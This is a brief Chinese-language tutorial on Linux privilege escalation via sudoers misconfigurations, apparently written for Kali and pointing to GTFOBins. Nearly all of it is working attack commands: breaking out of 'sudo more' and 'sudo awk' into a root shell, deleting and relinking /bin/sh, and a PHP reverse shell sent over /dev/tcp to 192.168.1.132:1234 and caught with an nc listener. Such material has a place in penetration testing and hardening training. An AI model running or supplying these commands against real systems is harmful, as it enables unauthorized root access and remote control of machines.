sudu提权

参考网站：https://gtfobins.github.io/

kali linux 下etc/sudoers 文件解析

1. vim /etc/sudoers

复制代码

sudo su 命令
当使用sudo命令进行提权时，需要验证当前用户的密码：



一，sudo more 命令提权
修改文件 /etc/sudoers

1. kali ALL=(ALL) /usr/bin/more

复制代码

在执行命令时：


提权方法：
执行

1. sudo more /etc/passwd

复制代码

接着输入

1. !/bin/sh

复制代码

提权成功，如图



二，sudo awk 提权
修改文件 /etc/sudoers

执行命令：

1. sudo awk 'BEGIN{system("/bin/sh")}'

复制代码

提权成功


三，php反弹提权
先在kali下执行以下命令，重建一下软连接

1. rm -rf /bin/sh
   
2. ln -s /bin/bash /bin/sh

复制代码

修改文件 /etc/sudoers


公网执行nc命令监听：

1. nc -lvp 1234

复制代码

kali 下执行

1. sudo php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/bash -i >& /dev/tcp/192.168.1.132/1234 0>&1");'

复制代码

查看公网cmd窗口变化

提权成功。